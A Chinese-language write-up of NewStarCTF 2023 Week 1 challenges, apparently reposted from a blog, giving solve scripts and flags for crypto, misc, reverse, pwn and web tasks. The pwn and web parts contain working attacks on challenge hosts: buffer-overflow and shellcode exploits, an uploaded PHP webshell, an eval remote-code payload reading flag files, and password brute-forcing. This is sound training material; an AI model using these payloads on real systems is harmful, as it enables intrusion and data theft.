[NewStarCTF2023]Week1
[NewstarCTF2023]Week1_Official
Crypto
Caesar's Secert
flag
flag{ca3s4r's_c1pher_i5_v4ry_3azy}
Fence
flag
flag{reordering_the_plaintext#686f8c03}
brainfuck
def shrinkBFCode(code):
cPos2Vars = {} #位置对应的变量
cPos2Change = {} #位置中 + 号 增加的值
varPos = 0
nCode = []
incVal = 0
lc = None
dataChangeOp = set(['+', '-'])
dataShiftOp = set(['>', '<'])
for i in range(len(code)):
c = code[i]
if c not in dataChangeOp and lc in dataChangeOp:
cPos2Change[len(nCode)] = incVal
cPos2Vars[len(nCode)] = varPos
nCode.append('+')
incVal = 0
if c == '>':
varPos += 1
elif c == '<':
varPos -= 1
else:
if c in dataChangeOp:
incVal += 1 if c == '+' else -1
else:
#if lc == '>' or lc == '<':
# cPos2Vars[len(nCode)] = varPos
cPos2Vars[len(nCode)] = varPos
nCode.append(c)
lc = c
return ''.join(nCode), cPos2Vars, cPos2Change
def generatePyCode(shellCode, pVars, pChange):
pyCodes = []
bStacks = []
whileVarCache = {}
for i, c in enumerate(shellCode):
d_pos = i if i not in pVars else pVars[i]
d_change = 1 if i not in pChange else pChange[i]
indentLevel = len(bStacks)
indentStr = ' '*(4*indentLevel)
if c == '[':
pyCodes.append('{}while data[{}] != 0:'.format(indentStr, d_pos))
bStacks.append((c, i))
whileVarCache[i] = {}
elif c == ']':
if bStacks[-1][0] != '[':
raise Exception('miss match of {}] found between {} and {}'.format(bStacks[-1][0], bStacks[-1][1], i))
cNum = i-bStacks[-1][1]
if cNum == 2:
del pyCodes[-1]
del pyCodes[-1]
d_pos_l = i-1 if i-1 not in pVars else pVars[i-1]
pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
whileCode = shellCode[bStacks[-1][1]+1 : i]
if cNum>2 and '[' not in whileCode and not '%' in whileCode: # nested loop is a bit complicated, just skip
loopCondvar = bStacks[-1][1]
d_pos_l = loopCondvar if loopCondvar not in pVars else pVars[loopCondvar]
whileVars = whileVarCache[bStacks[-1][1]]
cVarChange = whileVars[d_pos_l]
# remove statement of same indent
while len(pyCodes)>0 and pyCodes[-1].startswith(indentStr) and pyCodes[-1][len(indentStr)]!=' ':
pyCodes.pop()
pyCodes.pop()
#del pyCodes[bStacks[-1][1]-i:]
for vPos, vChange in whileVars.items():
if vPos == d_pos_l:
continue
ctimes = abs(vChange / cVarChange)
ctimesStr = '' if ctimes==1 else '{}*'.format(ctimes)
cSign = '+' if vChange > 0 else '-'
pyCodes.append('{}data[{}] {}= {}data[{}]'.format(' '*(4*(indentLevel-1)),
vPos, cSign, ctimesStr, d_pos_l))
pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
del whileVarCache[bStacks[-1][1]]
bStacks.pop()
elif c == '.':
pyCodes.append('{}print(data[{}])'.format(indentStr, d_pos))
elif c == ',':
pyCodes.append('{}data[{}] = ord(stdin.read(1))'.format(indentStr, d_pos))
elif c == '+':
opSign = '-=' if d_change < 0 else '+='
if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, d_change)
else:
pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
if bStacks:
whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
whileVarCache[bStacks[-1][1]][d_pos] += d_change
elif c == '-':
opSign = '+=' if d_change < 0 else '-='
if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, -d_change)
else:
pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
if bStacks:
whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
whileVarCache[bStacks[-1][1]][d_pos] -= d_change
elif c == '%':
pyCodes.append('{}data[{}] %= data[{}]'.format(indentStr, d_pos, d_pos+1))
return '\n'.join(pyCodes)
shellcode = "++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++."
shrinkCode, pVars, pChange = shrinkBFCode(shellcode)
print(generatePyCode(shrinkCode, pVars, pChange))
解密得到
data[0] += 8
data[2] += 2.0*data[0]
data[3] += 4.0*data[0]
data[4] += 6.0*data[0]
data[5] += 8.0*data[0]
data[6] += 10.0*data[0]
data[7] += 12.0*data[0]
data[8] += 14.0*data[0]
data[9] += 16.0*data[0]
data[10] += 18.0*data[0]
data[11] += 20.0*data[0]
data[12] += 22.0*data[0]
data[13] += 24.0*data[0]
data[14] += 26.0*data[0]
data[15] += 28.0*data[0]
data[16] += 30.0*data[0]
data[0] = 0
data[7] += 6
print(data[7])
data[8] -= 4
print(data[8])
data[7] -= 5
print(data[7])
data[8] -= 5
print(data[8])
data[9] -= 5
print(data[9])
data[6] -= 1
print(data[6])
data[8] += 2
print(data[8])
print(data[8])
print(data[7])
print(data[8])
data[8] += 6
print(data[8])
print(data[8])
print(data[8])
print(data[8])
print(data[8])
data[8] -= 6
print(data[8])
print(data[7])
print(data[8])
data[3] += 3
print(data[3])
data[7] += 1
print(data[7])
data[4] += 7
print(data[4])
data[7] += 1
print(data[7])
data[4] -= 7
print(data[4])
data[7] -= 1
print(data[7])
data[4] += 1
print(data[4])
data[4] += 7
print(data[4])
data[4] -= 2
print(data[4])
print(data[4])
data[8] -= 3
print(data[8])
data[8] -= 1
print(data[8])
data[4] -= 1
print(data[4])
data[4] += 3
print(data[4])
print(data[8])
data[4] -= 7
print(data[4])
data[4] += 1
print(data[4])
data[9] += 2
print(data[9])
简单修改一下输出得到
或者CTF在线工具
flag
flag{Oiiaioooooiai#b7c0b1866fe58e12}
Vigenère
flag
flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}
babyrsa
from Crypto.Util.number import *
import binascii
import gmpy2
import rsa
from factordb.factordb import FactorDB
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
a = FactorDB(n)
a.connect()
fac = a.get_factor_list()
phi_n = 1
for i in fac:
phi_n *= (i-1)
d = gmpy2.invert(e, phi_n)
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
m = gmpy2.powmod(c, d, n)
print(binascii.unhexlify(hex(m)[2:]))
#flag{us4_s1ge_t0_cal_phI}
flag
flag{us4_s1ge_t0_cal_phI}
babyxor
enc = 'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
cipher_hex = [int(enc[i:i+2],16) for i in range(0, len(enc), 2)]
#print(cipher_hex)
for key in range(255):
flag = ''
for c in cipher_hex:
flag += chr(c ^ key)
#print(flag)
if 'flag' in flag:
print(f'key={key}\n{flag}')
break
#flag{x0r_15_symm3try_and_e4zy!!!!!!}
flag
flag{x0r_15_symm3try_and_e4zy!!!!!!}
small d
n,e都很大,直接考虑维纳攻击
github上找个脚本
import gmpy2
import libnum
def continuedFra(x, y):
"""计算连分数
:param x: 分子
:param y: 分母
:return: 连分数列表
"""
cf = []
while y:
cf.append(x // y)
x, y = y, x % y
return cf
def gradualFra(cf):
"""计算传入列表最后的渐进分数
:param cf: 连分数列表
:return: 该列表最后的渐近分数
"""
numerator = 0
denominator = 1
for x in cf[::-1]:
# 这里的渐进分数分子分母要分开
numerator, denominator = denominator, x * denominator + numerator
return numerator, denominator
def solve_pq(a, b, c):
"""使用韦达定理解出pq,x^2−(p+q)∗x+pq=0
:param a:x^2的系数
:param b:x的系数
:param c:pq
:return:p,q
"""
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
"""计算列表所有的渐近分数
:param cf: 连分数列表
:return: 该列表所有的渐近分数
"""
gf = []
for i in range(1, len(cf) + 1):
gf.append(gradualFra(cf[:i]))
return gf
def wienerAttack(e, n):
"""
:param e:
:param n:
:return: 私钥d
"""
cf = continuedFra(e, n)
gf = getGradualFra(cf)
for d, k in gf:
if k == 0: continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return d
n= 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
e= 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
c= 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())
#flag{learn_some_continued_fraction_technique#dc16885c}
flag
flag{learn_some_continued_fraction_technique#dc16885c}
babyencoding
part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`
part 1 base64: flag{dazzling_encoding#4e0ad4
part 2 base32: f0ca08d1e1d0f10c0c7afe422fea7
part 3 uuencode: c55192c992036ef623372601ff3a}
flag
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}
Affine
仿射密码
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
modulus = 256
enc = bytes.fromhex(
'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
#print(enc)
for key_0 in range(256):
try:
inv_key_0 = modinv(key_0, modulus)
except:
continue
for key_1 in range(256):
decrypted = bytes([(inv_key_0 * (c - key_1)) % modulus for c in enc])
if b'flag{'in decrypted:
print("Key found:", key_0, key_1)
print("Decrypted flag:", decrypted)
#Key found: 17 23
#Decrypted flag: b'flag{4ff1ne_c1pher_i5_very_3azy}'
flag
flag{4ff1ne_c1pher_i5_very_3azy}
babyaes
from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *
def pad(data):
return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])
def main():
flag_ = pad(flag)
key = os.urandom(16) * 2
iv = os.urandom(16)
print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
aes = AES.new(key, AES.MODE_CBC, iv)
enc_flag = aes.encrypt(flag_)
print(enc_flag)
if __name__ == "__main__":
main()
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
搓个脚本
from Crypto.Cipher import AES
from Crypto.Util.number import *
a = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
a = a ^ 1
#print(a)
print(long_to_bytes(a))
#_a = b'\x08 \x16 \x11 % \xa0 \xa6 \xc5 \xcb ^ \x02 \x99 N F ` \xea , \xeb L \x08 b \xc1 \x98 \xc2 \x07 \x8f \xa3 \xc1 O % q \xfc , '
key = b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,'
key = bytes_to_long(key)
iv = key ^ a
print(long_to_bytes(iv))
key = b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,'
iv = b'\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
aes = AES.new(key, AES.MODE_CBC, iv)
dec_flag = aes.decrypt(enc)
print(dec_flag)
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xebL\x08b\xc1\x98\xc2\x07\x8f\xa3\xc1O%q\xfc,'
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
#b'firsT_cry_Aes\x00\x00\x00'
flag
flag{firsT_cry_Aes}
Misc
CyberChef's Secret
flag
flag{Base_15_S0_Easy_^_^}
空白格
flag
flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}
机密图片
扫码的结果不对,应该有隐写
运用工具StegSolver
flag
flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}
隐秘的眼睛
SilentEye直接梭
flag
flag{R0ck1ng_y0u_63b0dc13a591}
流量!鲨鱼!
wireshark打开,大略看一下http,200 OK包很可疑
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
应该是base64,base64一次看到熟悉的Zmxh,就猜到要再base64一次
flag
flag{Wri35h4rk_1s_u53ful_b72a609537e6}
压缩包们
修复文件头,修复成功后后缀名改成.zip解压
flag.zip提示损坏
继续修复
或者你如果是高贵的bandizip pro用户
注意到flag.zip内有一段base64密文
解密出来是I like six-digit numbers because they are very concise and easy to remember.
应该是提示flag.zip的解压密码是六位数字,密码232311
flag
flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}
Reverse
easy_RE
flag
flag{welc0me_to_rev3rse!!}
Segments
shift+F7
手动过滤一下,修改格式得到flag
flag
flag{You_ar3_g0od_at_f1nding_ELF_segments_name}
咳
upx -d 脱壳
exp
enc = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
flag = ''
for i in enc:
flag += chr(ord(i) - 1)
print(flag)
flag
flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}
ELF
encode加密完标准base64
先把密文base64解码成hex
exp
enc = [0x56, 0x5c, 0x51, 0x57, 0x6b, 0x74, 0x20, 0x8f, 0x24, 0x5f,
0x65, 0x8f, 0x27, 0x5e, 0x5f, 0x67, 0x8f, 0x67, 0x58, 0x51,
0x27, 0x8f, 0x75, 0x7c, 0x76, 0x8f, 0x21, 0x63, 0x2f, 0x6d]
flag = ''
for i in enc:
flag += chr(i - 16 ^ 0x20)
print(flag)
#flag{D0_4ou_7now_wha7_ELF_1s?}
flag
flag{D0_4ou_7now_wha7_ELF_1s?}
AndroXor
jadx打开,循环异或
exp
enc = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
key = 'happyx3'
key_ascii = [ord(char) for char in key]
flag = ""
for i, value in enumerate(enc):
key_value = key_ascii[i % len(key_ascii)]
if isinstance(value, int):
xor_result = value ^ key_value
elif isinstance(value, str):
xor_result = ord(value) ^ key_value
flag += chr(xor_result)
print(flag)
#flag{3z_And0r1d_X0r_x1x1}
flag
flag{3z_And0r1d_X0r_x1x1}
Endian
还是循环异或,因为小端序,所以异或因子是[0x78,0x56,0x34,0x12]
shift+E提取出array
exp
enc = [
0x1E, 0x3A, 0x55, 0x75, 0x03, 0x3A, 0x58, 0x7B, 0x0C, 0x22,
0x58, 0x4D, 0x3D, 0x38, 0x50, 0x7B, 0x19, 0x38, 0x6B, 0x73,
0x05]
key = [0x78,0x56,0x34,0x12]
flag = ''
for i, value in enumerate(enc):
key_value = key[i % len(key)]
flag += chr(value ^ key_value)
print(flag)
#flag{llittl_Endian_a}
flag
flag{llittl_Endian_a}
lazy_activity
非预期
正常解法
jadx打开有个flagactivity进程应该是点10000次出flag
打开模拟器app内提示'Where is my flag? Try to start another Activity.'
那就利用模拟器的adb工具
adb shell
su
am start -n com.droidlearn.activity_travel/.FlagActivity
模拟器弹出这个界面
鼠标连点器或者写python脚本模拟点击就行
网上随便找的脚本
import pyautogui as pd
import time
pd.FAILSAFE = True
time.sleep(3)
#3秒时间自己移动到要点击的位置
pd.click(clicks=100000,interval=0.0001)
# pyautogui.click()
# (100,100, clicks=2,interval=0.5,button=‘right’,duration=0.2)
# 位置,点击次数,间隔时间,右键(默认左键),移动间隔
flag
flag{Act1v1ty_!s_so00oo0o_Impor#an#}
EzPE
打不开,头文件被修改了
随便找个exe文件复制过来fix一下
简单的异或
exp
enc = [
0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C,
0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51,
0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04,
0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]
flag = ''
l = len(enc)-2
for i in range(l,-1,-1):
enc[i] ^= (i ^ enc[i+1])
for i in enc:
flag += chr(i)
print(flag)
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}
flag
flag{Y0u_kn0w_what_1s_PE_File_F0rmat}
PWN
ret2text
栈溢出
exp
from pwn import *
p=remote("node4.buuoj.cn",25617)
elf = ELF ('./ret2text')
backdoor = elf.symbols['backdoor']
payload = b'a'*40+p64(backdoor)
p.sendline(payload)
p.interactive()
newstar_shop
看附件知道是个整型溢出
shop里面的money是unsigned int,无符号整数,但是don't choose里面的money是int,有符号整数因此可以整数溢出,让他成为负数再返回购买。
依次输入1212313
ezshellcode
有个read
看看buf
直接传'\x90' 全nop
from pwn import *
banary = "./ezshellcode"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 25641
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')
sh = shellcraft.sh()
payload = b'\x90'*(0x8+8) + asm(sh)
io.send(payload)
io.interactive()
random
有个随机数,直接调用
from pwn import *
banary = "./pwn"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26831
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')
clibc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
clibc.srand(clibc.time(0))
io.sendlineafter("number?\n",str(clibc.rand()))
io.interactive()
pieee
PIE保护
看看buf在栈中位置
传完buf 0x28个后直接跳到0x6c
from pwn import *
banary = "./pie"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26955
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')
payload = b'a'*(0x28)+b'\x6c'
io.send(payload)
io.interactive()
web
ErrorFlask
随便传两个参数
http://236f6195-02b3-4823-a05d-a72a6fb2080a.node4.buuoj.cn:81/?number1={{%201+1%20}}&number2=1
flag
flag{Y0u_@re_3enset1ve_4bout_deb8g}
Begin of HTTP
提示用get方式传参,那就http://node4.buuoj.cn:28821/?ctf=1
提示用post 传 secret
F12看一下源码,找一下 secret
得到 secret=n3wst4rCTF2023g00000d
post 传一下
改一下cookie,改成ctfer
改 User-Agent 为 NewStarCTF2023
改Referer为 newstarctf.com
最后改一下请求头
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28821
Content-Length: 28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:28821
Content-Type: application/x-www-form-urlencoded
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: newstarctf.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Connection: close
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
secret=n3wst4rCTF2023g00000d
泄露的秘密
找出泄露的敏感信息
访问 http://7dda953a-14dd-4219-bc4b-aee8b2ba0419.node4.buuoj.cn:81/www.zip
得到两个文件
robots.txt
和index.php
PART ONE: flag{r0bots_1s_s0_us3ful
<?php
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>";
flag
flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
Begin of Upload
前端有文件后缀名检测
直接在包中修改后缀名
POST / HTTP/1.1
Host: 56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Length: 308
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJDwfZKOoSI69Xzwk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="file"; filename="webshell2.php"
Content-Type: image/png
<?=system($_GET[2]);
------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="submit"
Upload!!!
------WebKitFormBoundaryJDwfZKOoSI69Xzwk--
传完之后访问
http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/upload/webshell2.php?2=tac%20/fl*
flag
flag{32ae814a-7562-460c-a936-e6b88ed93f8f}
Begin of PHP
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['key1']) && isset($_GET['key2'])){
echo "=Level 1=<br>";
if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
$flag1 = True;
}else{
die("nope,this is level 1");
}
}
if($flag1){
echo "=Level 2=<br>";
if(isset($_POST['key3'])){
if(md5($_POST['key3']) === sha1($_POST['key3'])){
$flag2 = True;
}
}else{
die("nope,this is level 2");
}
}
if($flag2){
echo "=Level 3=<br>";
if(isset($_GET['key4'])){
if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
$flag3 = True;
}else{
die("nope,this is level 3");
}
}
}
if($flag3){
echo "=Level 4=<br>";
if(isset($_GET['key5'])){
if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
$flag4 = True;
}else{
die("nope,this is level 4");
}
}
}
if($flag4){
echo "=Level 5=<br>";
extract($_POST);
foreach($_POST as $var){
if(preg_match("/[a-zA-Z0-9]/",$var)){
die("nope,this is level 5");
}
}
if($flag5){
echo file_get_contents("/flag");
}else{
die("nope,this is level 5");
}
}
get传参http://7cef97a6-de7f-45e3-be80-6aff9cecbbab.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=%22%22&key5[]=1
hackbar传参key3[]=&_POST=1&flag5=1
R!C!E!
<?php
highlight_file(__FILE__);
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
$password=md5($_POST['password']);
$code=$_POST['e_v.a.l'];
if(substr($password,0,6)==="c4d038"){
if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
eval($code);
}
}
}
爆破得到MD5(114514)='c4d038b4bed09fdb1471ef51ec3a32cd'
满足前6位是c4d038
hackbar传参
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
获取flag
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
EasyLogin
密码应该是个md5
随便注册个用户看看
登录成功后看看源代码可以肯定是md5
是个弱口令
尝试爆破admin
发送到intruder
payload位置选择pwd
payload设置一下,尝试用1400w_rockyou字典爆破, processing设置成md5
有个8360的不一样,应该就是爆破成功的,把pw复制一下
回到登录界面,登录admin,pw随便写,拦截到请求包后把pw修改成复制的pw
记得在proxy setting里面把抓返回包的也开一下
修改完pw后一直点放行,抓到含flag的response包
本文来自博客园,作者:{Tree_24},转载请注明原文链接:{https://www.cnblogs.com/Tree-24/}